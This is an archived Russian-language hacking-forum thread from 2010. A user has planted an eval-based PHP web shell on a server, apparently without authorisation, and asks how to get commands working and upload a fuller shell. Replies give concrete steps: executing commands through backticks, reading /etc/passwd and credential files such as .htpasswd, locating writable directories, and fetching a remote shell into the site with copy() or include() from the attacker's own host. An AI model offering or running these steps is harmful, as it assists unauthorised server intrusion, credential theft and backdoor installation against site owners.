ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Закрытая тема
 
Опции темы Поиск в этой теме Опции просмотра

php шелл не работают команды
  #1  
Старый 08.05.2010, 23:46
nullik
Новичок
Регистрация: 26.02.2010
Сообщений: 7
Провел на форуме:
14486

Репутация: 0
Question php шелл не работают команды

залит eval('cmd') php шелл, но в чем проблема не понятно
команда shell.php?cmd=passthru('uname'); выдаёт Linux
а уже passthru('uname -a'); выдаёт пустой лист.
Так же с 'ls' (выдает список файлов) и 'ls -a' (пустой лист), в итоге не могу залить нормальный шелл. Ни через php функцию copy, file_get_contents, ни через exec (wget);
Подскажите в чем проблема, плиз.

Последний раз редактировалось nullik; 08.05.2010 в 23:53..
 

  #2  
Старый 09.05.2010, 00:00
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557

Репутация: 606


По умолчанию

вместо пробела "+" ставь
 

  #3  
Старый 09.05.2010, 00:02
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

ешо через принт попробуй

print(`ls -al`)
 

  #4  
Старый 09.05.2010, 00:23
nullik
Новичок
Регистрация: 26.02.2010
Сообщений: 7
Провел на форуме:
14486

Репутация: 0
По умолчанию

Цитата:
Сообщение от попугай  
вместо пробела "+" ставь
passthru('uname+-a');
пустой лист.
Цитата:
print(`ls -al`)
работает правильно, тогда вопрос как залить шелл в такой ситуации?
copy(`http://moy sayt.com/shell.txt`,dirname(__FILE__).`/shell.php`);
не срабатывает например

Последний раз редактировалось nullik; 09.05.2010 в 00:27..
 

  #5  
Старый 09.05.2010, 00:27
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

wget не катит?
 

  #6  
Старый 09.05.2010, 00:28
nullik
Новичок
Регистрация: 26.02.2010
Сообщений: 7
Провел на форуме:
14486

Репутация: 0
По умолчанию

Цитата:
Сообщение от Konqi  
wget не катит?
дай плиз полную выкладку по wget, может я где промахиваюсь
 

  #7  
Старый 09.05.2010, 00:36
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

http://www.gnu.org/software/wget/manual/wget.html

а еще можешь читать системные файлы если есть права

print(`cat /etc/passwd`)

определи полный путь к сайту и читай скрипты
 

  #8  
Старый 09.05.2010, 00:39
nullik
Новичок
Регистрация: 26.02.2010
Сообщений: 7
Провел на форуме:
14486

Репутация: 0
По умолчанию

Цитата:
определи полный путь к сайту и читай скрипты
не хочу читать, хочу писать
смысл в shadow файлах?
дай плиз php команду для залива, wget -o не срабатывает, GET тоже, fetch Не хочет, может я где не так пишу - напиши пример (гугль шарил, не помогло).
 

  #9  
Старый 09.05.2010, 00:43
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

Цитата:
Сообщение от nullik  
не хочу читать, хочу писать
если можешь читать конфиг файлы увидишь много интересного,
например admin.php,db.php,login.php

или файлы .htaccess, .htpasswd

ешо попробуй include("yoursite.com/shell.php"); или require()
 

  #10  
Старый 09.05.2010, 00:43
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557

Репутация: 606


По умолчанию

Цитата:
Сообщение от nullik  
copy(`http://moy sayt.com/shell.txt`,dirname(__FILE__).`/shell.php`);
не срабатывает например
такие кавычки нельзя использовать для опредления строк, только
Цитата:
'
и
Цитата:
"
для начала найди папки, куда писать можно командой ls -lia или find
 
Закрытая тема



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Компания Facebook открыла код высокопроизводительного PHP транслятора Suicide Мировые новости 6 05.02.2010 07:43
Поиск PHP уязвимостей на примере phpBB _-[A.M.D]HiM@S-_ Статьи 1 29.10.2006 11:18
Основные команды командной строчки. silveran Windows 5 27.10.2005 14:45
Защищаем Php. Шаг за шагом. k00p3r Чужие Статьи 0 13.06.2005 11:31
Защищаем MySql. Шаг за шагом k00p3r Чужие Статьи 0 13.06.2005 11:18



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ